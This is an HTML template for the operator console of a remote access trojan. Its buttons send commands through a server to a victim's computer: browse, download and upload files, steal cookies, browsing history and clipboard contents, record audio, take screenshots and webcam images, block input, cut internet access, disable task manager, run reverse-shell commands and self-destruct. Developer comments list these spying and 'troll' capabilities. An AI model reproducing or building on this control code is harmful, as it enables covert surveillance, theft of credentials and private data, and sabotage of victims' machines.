<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>control: {{ u }}</title>
    <style>
        .instruction_wrapper {
          display: flex;
          align-items: center;
        }

        .instruction_wrapper > *:not(:last-child) {
          margin-right: 10px;
        }

        .instruction_type {
            font-size: 20px;
        }
    </style>
</head>
<body>
    <h1>you are controlling: {{ u }}</h1>
    <hr>
    <h2>filesystem</h2>
    <b>cd</b>
    <form>
        <input type="text" id="cd" placeholder="change directory">
        <button onclick="change_directory()">change</button>
    </form>
    <br>
    <b>ls</b><br>
    <button onclick="list_current_directory()">list current directory</button>
    <br><br>
    <b>download</b>
    <form>
        <input type="text" id="download" placeholder="download file">
        <button onclick="download_file()">download</button>
    </form>
    <br>
    <b>upload</b>
    <form>
        <input type="file" id="upload">
        <br>
        <button type="submit" onclick="upload_file()">upload file</button>
    </form>
    <hr>
    <h2>troll</h2>
    <b>bscreen</b>
    <form>
        <input type="number" id="bscreen" placeholder="duration (s)">
        <button onclick="block_screen()">block</button>
    </form>
    <br>
    <b>binput</b>
    <form>
        <input type="number" id="binput" placeholder="duration (s)">
        <button onclick="block_input()">block</button>
    </form>
    <br>
    <b>psound (dangerous) (only mp3)</b>
    <form>
        <input type="file" id="psound">
        <br>
        <button type="submit" onclick="play_sound()">playsound</button>
    </form>
    <br>
    <b>offnet</b>
    <form>
        <input type="number" id="offnet" placeholder="duration (s)">
        <button onclick="kill_internet()">turn off</button>
    </form>
    <br>
    <b>killpc</b><br>
    <button onclick="kill_computer()">kill</button>
    <hr>
    <h2>spy</h2>
    <b>gcookies</b><br>
    <button onclick="grab_cookies()">grab cookies</button>
    <br><br>
    <b>gip</b><br>
    <button onclick="grab_ip()">grab public ip</button>
    <br><br>
    <b>ghistory</b><br>
    <button onclick="grab_history()">grab history</button>
    <br><br>
    <b>raudio (dangerous)</b>
    <form>
        <input type="number" id="raudio" placeholder="duration (s)">
        <button onclick="record_audio()">record</button>
    </form>
    <br>
    <b>ss</b><br>
    <button onclick="screenshot()">screenshot</button>
    <br><br>
    <b>webcam</b><br>
    <button onclick="webcam()">webcam image</button>
    <br><br>
    <b>cboard</b><br>
    <button onclick="clipboard()">get clipboard</button>
    <br><br>
    <hr>
    <h2>other</h2>
    <b>dtaskmgr</b><br>
    <button onclick="disable_taskmgr()">disable taskmgr</button>
    <br><br>
    <b>disableapp</b>
    <form>
        <input type="text" id="disableapp" placeholder="disable app">
        <button onclick="disable_app()">disable</button>
    </form>
    <br>
    <b>rshell</b>
    <form>
        <input type="text" id="rshell" placeholder="command...">
        <button onclick="reverse_shell()">execute</button>
    </form>
    <br>
    <b>destruct</b><br>
    <button onclick="self_destruct()">self destruct</button>
    <br><br>
    <hr>
    <h2>output</h2>
    <button onclick="clear_output()">clear</button>
    <hr>
    <div id="output"></div>
    <script>
        for (let button of document.querySelectorAll("button")) {
            button.addEventListener("click", function(event) {
                event.preventDefault();
            });
        }
        function add_instruction(list) {
            let json = ["{{ u }}", list];
            fetch("/add_instruction/", {
              method: "POST",
              headers: {
                "Content-Type": "application/json"
              },
              body: JSON.stringify(json)
            });
        }
        function clear_output() {
            let output_list = document.querySelector("#output");
            output_list.innerHTML = "";
            fetch("/clear_output/?u={{ u }}");
        }
        last_id = ""
        seen_ids = new Set();
        function update_output() {
            fetch("/get_output/?u={{ u }}&last=" + last_id).then(response => response.json())
            .then(data => {
                let output_list = document.querySelector("#output");
                let add_newline = false;
                for (let instruction_id in data) {
                    if (seen_ids.has(instruction_id)) continue;
                    seen_ids.add(instruction_id);
                    last_id = instruction_id;
                    let output_elem;
                    if (data[instruction_id][0] == "ss" || data[instruction_id][0] == "webcam") {
                        output_elem = document.createElement("img");
                        output_elem.setAttribute("src", "/static/placeholder.png");
                        output_elem.setAttribute("other_src", "data:image/png;base64," + data[instruction_id][1])
                        output_elem.addEventListener("click", () => {
                            let temp = output_elem.getAttribute("src");
                            output_elem.setAttribute("src", output_elem.getAttribute("other_src"));
                            output_elem.setAttribute("other_src", temp);
                        })
                        add_newline = true;
                    } else if (data[instruction_id][0] == "raudio") {
                        output_elem = document.createElement("audio");
                        source_elem = document.createElement("source");
                        source_elem.setAttribute("src", "/user_serve_temp/?f=" + data[instruction_id][1] + "&w=1");
                        source_elem.setAttribute("type", "audio/wav");
                        output_elem.setAttribute("controls", "");
                        output_elem.appendChild(source_elem);
                        add_newline = true;
                    } else if (data[instruction_id][0] == "download") {
                        output_elem = document.createElement("a");
                        output_elem.textContent = "DOWNLOAD FILE";
                        output_elem.setAttribute("href", "/user_serve_temp/?f=" + data[instruction_id][1]);
                    } else {
                        output_elem = document.createElement("p");
                        output_elem.textContent = data[instruction_id][1];
                    }
                    wrapper_elem = document.createElement("div");
                    wrapper_elem.setAttribute("class", "instruction_wrapper");
                    type_elem = document.createElement("b");
                    type_elem.setAttribute("class", "instruction_type");
                    type_elem.textContent = `[${data[instruction_id][0]}]`;
                    wrapper_elem.appendChild(type_elem);
                    wrapper_elem.appendChild(output_elem);
                    output_list.appendChild(wrapper_elem);
                    if (add_newline) output_list.appendChild(document.createElement("br"));
                }
            });
        }
        update_output();
        setInterval(update_output, 2000);
        /*
        FILESYSTEM:
        [cd] change directory
        [ls] list current directory
        [download] download file
        [upload] upload file
        */
        function change_directory() {
            add_instruction(["cd", document.querySelector("#cd").value]);
        }
        function list_current_directory() {
            add_instruction(["ls"]);
        }
        function download_file() {
            add_instruction(["download", document.querySelector("#download").value]);
        }
        function upload_file() {
            let form_data = new FormData();
            form_data.append("file", document.querySelector("#upload").files[0]);
            fetch("/upload_temp/", {
                method: "POST",
                body: form_data
            }).then(response => {
                return response.text();
            }).then(file_id => {
                add_instruction(["upload", document.querySelector("#upload").files[0].name, file_id]);
            });
        }
        /*
        TROLL:
        [bscreen] block entire screen
        [binput] block input
        [psound] play sound
        [offnet] turn off internet
        [killpc] spawn a process which kills the entire computer
        */
        function block_screen() {
            add_instruction(["bscreen", document.querySelector("#bscreen").value]);
        }
        function block_input() {
            add_instruction(["binput", document.querySelector("#binput").value]);
        }
        function play_sound() {
            let form_data = new FormData();
            form_data.append("file", document.querySelector("#psound").files[0]);
            fetch("/upload_temp/", {
                method: "POST",
                body: form_data
            }).then(response => {
                return response.text();
            }).then(file_id => {
                add_instruction(["psound", file_id]);
            });
        }
        function kill_internet() {
            add_instruction(["offnet", document.querySelector("#offnet").value]);
        }
        function kill_computer() {
            add_instruction(["killpc"]);
        }
        /*
        SPY:
        [gcookies] grab cookies: return whatever
        [gip] grab publicip: return string [ok]
        [ghistory] grab history: return whatever (check jabor)
        [raudio] record audio
        [ss] screenshot: return base64 (unless we can return a file, then get an API which screenshots and return the file)
        [webcam] webcam image: return base64, unless above, or whatever CV returns
        [cboard] clipboard: return string [ok]
        */
        function grab_cookies() {
            add_instruction(["gcookies"]);
        }
        function grab_ip() {
            add_instruction(["gip"]);
        }
        function grab_history() {
            add_instruction(["ghistory"]);
        }
        function record_audio() {
            add_instruction(["raudio", document.querySelector("#raudio").value]);
        }
        function screenshot() {
            add_instruction(["ss"]);
        }
        function webcam() {
            add_instruction(["webcam"]);
        }
        function clipboard() {
            add_instruction(["cboard"]);
        }
        /*
        OTHER
        [dtaskmgr] disable task manager (keep killing it) (need admin)
        [disableapp] disable certain apps (keep killing, might need admin)
        [rshell] reverse shell [ok]
        [destruct] self destruct
        */
        function disable_taskmgr() {
            add_instruction(["dtaskmgr"]);
        }
        function disable_app() {
            add_instruction(["disableapp", document.querySelector("#disableapp").value]);
        }
        function reverse_shell() {
            add_instruction(["rshell", document.querySelector("#rshell").value]);
        }
        function self_destruct() {
            add_instruction(["destruct"]);
        }
    </script>
</body>
</html>